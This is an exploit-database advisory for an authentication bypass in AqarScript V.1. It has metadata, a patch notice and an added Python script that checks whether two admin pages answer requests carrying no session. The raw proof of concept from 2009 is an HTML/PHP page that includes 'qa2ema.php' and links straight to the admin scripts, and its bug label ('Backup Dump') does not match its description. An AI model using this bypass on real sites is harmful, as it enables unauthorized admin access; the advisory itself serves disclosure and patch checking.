Remote Bypass Exploit
Vendor: AqarScript V.1
By: indoushka
CVSS: 8.8 (HIGH)
CWE: 287
Product Name: AqarScript V.1
Affected Version From: V.1
Affected Version To: V.1
Patch Exists: YES
Related CWE: N/A
CPE: a:aqarscript:aqarscript_v1
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows SP2 Français, Linux Français v.(9.4 Ubuntu)
2009

Aqar Script V.1 Remote Bypass Exploit

A vulnerability in Aqar Script V.1 allows a remote attacker to bypass authentication and gain access to the system. The vulnerability exists due to insufficient validation of user-supplied input in the 'qa2ema.php' script.

Mitigation:

The vendor has released a patch to address this vulnerability. It is recommended to apply the patch as soon as possible.
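
A post-patch check, as an added example that is not part of the original advisory or the vendor's code: it requests the two admin scripts linked from the PoC page below without any cookie and reports those that still answer 200. It assumes a patched install answers such requests with a redirect or 401/403; the stand-in server and its /login.php target are constructed for the demo.

```python
import http.server, threading, urllib.error, urllib.request

# Admin scripts linked from the PoC page (paths taken from this advisory).
ADMIN_PATHS = ["/Aqar/admin/aksam.php", "/Aqar/admin/amaken.php"]

class NoRedirect(urllib.request.HTTPRedirectHandler):
    def redirect_request(self, *args, **kwargs):
        return None  # do not follow: a 3xx then surfaces as HTTPError

def unauthenticated_status(base, path):
    """HTTP status returned to a client that sends no cookie or credentials."""
    opener = urllib.request.build_opener(urllib.request.ProxyHandler({}), NoRedirect)
    try:
        with opener.open(base + path, timeout=5) as resp:
            return resp.status
    except urllib.error.HTTPError as err:
        return err.code

def exposed_paths(base, paths=ADMIN_PATHS):
    """Admin paths that still serve content (200) without a session."""
    return [p for p in paths if unauthenticated_status(base, p) == 200]

class DemoHandler(http.server.BaseHTTPRequestHandler):
    # Constructed stand-in server: one guarded script, one left unguarded.
    GUARDED = {"/Aqar/admin/aksam.php"}
    def do_GET(self):
        if self.path in self.GUARDED and "Cookie" not in self.headers:
            self.send_response(302)
            self.send_header("Location", "/login.php")  # hypothetical login page
            self.end_headers()
        else:
            self.send_response(200)
            self.end_headers()
            self.wfile.write(b"admin panel")

    def log_message(self, *args):
        pass  # keep the demo quiet

def run_demo():
    server = http.server.HTTPServer(("127.0.0.1", 0), DemoHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    try:
        return exposed_paths("http://127.0.0.1:%d" % server.server_port)
    finally:
        server.shutdown()
        server.server_close()

if __name__ == "__main__":
    print(run_demo())
```

Against a real deployment, call `exposed_paths()` with the base URL of a host you administer; an empty list means every listed script refused the unauthenticated request.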

Exploit-DB raw data:

========================================================================================
| # Title : Aqar Script V.1 Remote By pass Exploit
| # Author : indoushka
| # email : indoushka@hotmail.com
| # Home : www.iqs3cur1ty.com/vb
| # Script : Powered By AqarScript
| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu)
| # Bug : Backup Dump
====================== Exploit By indoushka =================================
# Exploit :

<html dir=rtl>

<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1256">
<meta name="GENERATOR" content="Microsoft FrontPage 4.0">
<meta name="ProgId" content="FrontPage.Editor.Document">
</head>

<body>
<table border="0" cellspacing="5" cellpadding="0">
<tr>
<td width="100%" colspan="3" valign="top" align="right">
<h1>لوحة التحكم - عقار سكريبت</h1>
</td>
<td width="100%" valign="top" align="right">
</td>
</tr>
<tr>
<td valign="top" align="right" nowrap>
<?php
include("./qa2ema.php");
?>
</td>
<meta http-equiv="Content-Language" content="ar-eg">
<td valign="top" align="right"><font face="Tahoma">اهلاً بك فى لوحة
التحكم الخاصة بعقار سكريبت<br>
ان شاء الله خاصية اضافة اماكن اضافية فى صفحة الاضافة <br>
ستكون موجودة فى النسخة 2<br>
<br>
<b><font size="1">مع تحيات كريم نت</font></b></font>
</tr>
</table>
</body>
<ul>
<li><a href="http://127.0.0.1/Aqar/admin/aksam.php">الأقسام</a></li>
<li><a href="http://127.0.0.1/Aqar/admin/amaken.php">الاماكن الاضافية</a></li>
</ul>
</html>

Dz-Ghost Team ===== Saoucha * Star08 * Redda * Silitoad * XproratiX * onurozkan * n2n * ========================
Greetz :
Exploit-db Team : (loneferret+Exploits+dookie2000ca)
all my friend :
His0k4 * Hussin-X * Rafik (www.Tinjah.com) * Yashar (www.sc0rpion.ir) SoldierOfAllah (www.m4r0c-s3curity.cc)
Stake (www.v4-team.com) * r1z (www.sec-r1z.com) * D4NB4R http://www.ilegalintrusion.net/foro/
www.securityreason.com * www.sa-hacker.com * Cyb3r IntRue (avengers team) * www.alkrsan.net * www.mormoroth.net
---------------------------------------------------------------------------------------------------------------